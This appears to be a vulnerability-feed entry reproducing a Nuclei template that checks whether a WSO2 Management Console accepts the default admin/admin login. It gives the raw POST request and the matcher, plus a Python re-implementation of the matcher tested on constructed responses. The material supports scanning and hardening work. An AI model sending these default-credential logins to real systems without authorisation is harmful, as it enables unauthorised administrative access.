wso2-default-login: WSO2 Management Console Default Login

Date: 2025-08-01 | Affected software: WSO2 | PoC: public

Vulnerability description

WSO2 Management Console default admin credentials were discovered.

PoC code [public]

id: wso2-default-login

info:
  name: WSO2 Management Console Default Login
  author: cocxanh
  severity: high
  description: WSO2 Management Console default admin credentials were discovered.
  reference:
    - https://docs.wso2.com/display/UES100/Accessing+the+Management+Console
    - https://is.docs.wso2.com/en/5.12.0/learn/multi-attribute-login/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
  tags: default-login,wso2,vuln

http:
  - raw:
      - |
        POST /carbon/admin/login_action.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}

    payloads:
      username:
        - admin
      password:
        - admin
    attack: pitchfork
    redirects: false
    matchers:
      - type: word
        words:
          - "/carbon/admin/index.jsp?loginStatus=true"
          - "JSESSIONID"
        part: header
        condition: and
# digest: 490a0046304402204fcd5c24b4238b6f86f17d40215c13309cb51febf83ac1604581b5b5c0a3d44102200c368e2c6465303a2cbfa3dbbaa94d19a3846e9a5a913fa40b8101da4e9c179b:922c64590222798bb761d5b6d8e72950
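To see exactly what this template counts as a successful login, here is an added Python example (not part of the template, the author's work, or the Nuclei project) that reproduces the `matchers` block: a `type: word` matcher with `part: header` and `condition: and`, so both the redirect to `index.jsp?loginStatus=true` and a `JSESSIONID` cookie must appear in the response headers, and a body that merely mentions those strings does not count. The two HTTP responses are constructed samples, not captures from a real WSO2 server.

```python
# The two strings the template requires in the response headers (from the matchers block).
REQUIRED_HEADER_WORDS = (
    "/carbon/admin/index.jsp?loginStatus=true",
    "JSESSIONID",
)


def split_response(raw: str) -> tuple[str, str]:
    """Split a raw HTTP response into (header block, body).

    `part: header` matches against the headers only, never the body, so the
    split must happen at the first blank line.
    """
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:  # tolerate responses that use bare LF line endings
        head, _, body = raw.partition("\n\n")
    return head, body


def header_matcher_matches(raw: str, words=REQUIRED_HEADER_WORDS) -> bool:
    """Return True only if every required word appears in the header block (condition: and).

    Note that the template sets `redirects: false`: if the 302 were followed, the
    Location header carrying loginStatus=true would be consumed and never matched.
    """
    head, _body = split_response(raw)
    return all(word in head for word in words)


# Constructed sample: what a successful console login looks like at the HTTP layer.
SUCCESS_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Set-Cookie: JSESSIONID=0123456789ABCDEF; Path=/; HttpOnly\r\n"
    "Location: https://wso2.example/carbon/admin/index.jsp?loginStatus=true\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Constructed sample: a failed login that still sets a session cookie and whose
# body happens to contain the success string. It must NOT match.
FAILURE_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Set-Cookie: JSESSIONID=FEDCBA9876543210; Path=/; HttpOnly\r\n"
    "Location: https://wso2.example/carbon/admin/login.jsp?loginStatus=false\r\n"
    "\r\n"
    "<html>/carbon/admin/index.jsp?loginStatus=true</html>\r\n"
)


if __name__ == "__main__":
    print("success response matches:", header_matcher_matches(SUCCESS_RESPONSE))  # True
    print("failure response matches:", header_matcher_matches(FAILURE_RESPONSE))  # False
```

Running the same check against a response from a console whose admin password has been changed should yield False, which is the quickest way to confirm the hardening took effect.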
